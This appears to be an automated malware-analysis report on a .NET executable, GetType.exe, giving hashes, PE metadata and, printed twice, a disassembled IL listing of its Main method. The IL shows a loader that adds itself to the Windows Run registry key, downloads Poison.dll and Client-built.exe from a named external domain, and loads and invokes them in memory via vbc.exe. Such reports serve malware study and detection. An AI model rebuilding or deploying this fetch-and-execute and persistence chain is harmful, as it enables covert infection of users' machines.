Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 0d3d485cb04de29a3b873372786e1f60
|
| Sha1 | d8d07f7cfb12992c59eafebcf073e9f0ecef8c73
|
| Sha256 | 5ad9c90d12ca1702027f6e53994d8cd4130d1e5c34865d0b235ef9810f663eeb
|
| Sha384 | 3973c144c8af1b8792bfc5838d3ab4ef14042a819e1ba9f36a97ab2de74cb588df5ca3990dbcc3cf99931c8ab972da16
|
| Sha512 | 38ab98ce214f7e60526f759fd33faf954e6dbffd94094d4f97bea886596866f592e1db9a8cef317ad407772cf3062bb78c7e59c5f95b22a4f4c6b9b80985f3f6
|
| SSDeep | 96:F0iitsANyWiOSesiukHYkIGoPg03riFCeeZQJpEtmZPnTopnhzNt:F0iasAN/5SesiuiYkIziPeDsPTKj
|
| TLSH | 94F1B811A3FC8236E9B61F365CB396D00676FB49EC77EA3E54C4010A5E617084EA1F32
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | PDB Path: c:\Users\suley\Documents\Visual Studio 2012\Projects\GetType\GetType\obj\Release\GetType.pdb |
| Module Name | GetType.exe |
| Full Name | GetType.exe |
| EntryPoint | System.Void Program::Main() |
| Scope Name | GetType.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | GetType |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.5 |
| Total Strings | 13 |
| Main Method | System.Void Program::Main() |
| Main IL Instruction Count | 89 |
| Main IL | ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.0 <null> ldloc.0 <null> ldstr GetType call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) newobj System.Void System.Net.WebClient::.ctor() stloc.1 <null> ldloc.1 <null> ldstr http://cosmic-cheats.com/Poison.dll callvirt System.Byte[] System.Net.WebClient::DownloadData(System.String) stloc.2 <null> ldloc.2 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.3 <null> ldloc.3 <null> ldstr Poison callvirt System.Type System.Reflection.Assembly::GetType(System.String) stloc.s V_4 ldloc.s V_4 ldnull <null> call System.Boolean System.Type::op_Equality(System.Type,System.Type) brfalse.s IL_0065: ldloc.s V_4 ldstr Error: Could not find the 'Poison' type in the assembly. call System.Void System.Console::WriteLine(System.String) leave IL_0111: ret ldloc.s V_4 ldstr Run callvirt System.Reflection.MethodInfo System.Type::GetMethod(System.String) stloc.s V_5 ldloc.s V_5 ldnull <null> call System.Boolean System.Reflection.MethodInfo::op_Equality(System.Reflection.MethodInfo,System.Reflection.MethodInfo) brfalse.s IL_008C: ldstr "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\vbc.exe" ldstr Error: Could not find the 'Run' method. call System.Void System.Console::WriteLine(System.String) leave IL_0111: ret ldstr C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe stloc.s V_6 newobj System.Void System.Net.WebClient::.ctor() stloc.s V_7 ldloc.s V_7 ldstr http://cosmic-cheats.com/Client-built.exe callvirt System.Byte[] System.Net.WebClient::DownloadData(System.String) stloc.s V_8 ldc.i4.1 <null> stloc.s V_9 ldc.i4.3 <null> newarr System.Object stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_13 ldc.i4.1 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_13 ldc.i4.2 <null> ldloc.s V_9 box System.Boolean stelem.ref <null> ldloc.s V_13 stloc.s V_10 ldstr Invoking the 'Run' method from Poison.dll... call System.Void System.Console::WriteLine(System.String) ldloc.s V_5 ldnull <null> ldloc.s V_10 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) stloc.s V_11 ldstr Method executed. ldloc.s V_11 call System.String System.String::Concat(System.Object,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0111: ret stloc.s V_12 ldstr An error occurred: {ex.Message} call System.Void System.Console::WriteLine(System.String) ldloc.s V_12 callvirt System.String System.Object::ToString() call System.Void System.Console::WriteLine(System.String) leave.s IL_0111: ret ret <null> |
| Module Name | GetType.exe |
| Full Name | GetType.exe |
| EntryPoint | System.Void Program::Main() |
| Scope Name | GetType.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | GetType |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.5 |
| Total Strings | 13 |
| Main Method | System.Void Program::Main() |
| Main IL Instruction Count | 89 |
| Main IL | ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.0 <null> ldloc.0 <null> ldstr GetType call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) newobj System.Void System.Net.WebClient::.ctor() stloc.1 <null> ldloc.1 <null> ldstr http://cosmic-cheats.com/Poison.dll callvirt System.Byte[] System.Net.WebClient::DownloadData(System.String) stloc.2 <null> ldloc.2 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.3 <null> ldloc.3 <null> ldstr Poison callvirt System.Type System.Reflection.Assembly::GetType(System.String) stloc.s V_4 ldloc.s V_4 ldnull <null> call System.Boolean System.Type::op_Equality(System.Type,System.Type) brfalse.s IL_0065: ldloc.s V_4 ldstr Error: Could not find the 'Poison' type in the assembly. call System.Void System.Console::WriteLine(System.String) leave IL_0111: ret ldloc.s V_4 ldstr Run callvirt System.Reflection.MethodInfo System.Type::GetMethod(System.String) stloc.s V_5 ldloc.s V_5 ldnull <null> call System.Boolean System.Reflection.MethodInfo::op_Equality(System.Reflection.MethodInfo,System.Reflection.MethodInfo) brfalse.s IL_008C: ldstr "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\vbc.exe" ldstr Error: Could not find the 'Run' method. call System.Void System.Console::WriteLine(System.String) leave IL_0111: ret ldstr C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe stloc.s V_6 newobj System.Void System.Net.WebClient::.ctor() stloc.s V_7 ldloc.s V_7 ldstr http://cosmic-cheats.com/Client-built.exe callvirt System.Byte[] System.Net.WebClient::DownloadData(System.String) stloc.s V_8 ldc.i4.1 <null> stloc.s V_9 ldc.i4.3 <null> newarr System.Object stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_13 ldc.i4.1 <null> ldloc.s V_8 stelem.ref <null> ldloc.s V_13 ldc.i4.2 <null> ldloc.s V_9 box System.Boolean stelem.ref <null> ldloc.s V_13 stloc.s V_10 ldstr Invoking the 'Run' method from Poison.dll... call System.Void System.Console::WriteLine(System.String) ldloc.s V_5 ldnull <null> ldloc.s V_10 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) stloc.s V_11 ldstr Method executed. ldloc.s V_11 call System.String System.String::Concat(System.Object,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0111: ret stloc.s V_12 ldstr An error occurred: {ex.Message} call System.Void System.Console::WriteLine(System.String) ldloc.s V_12 callvirt System.String System.Object::ToString() call System.Void System.Console::WriteLine(System.String) leave.s IL_0111: ret ret <null> |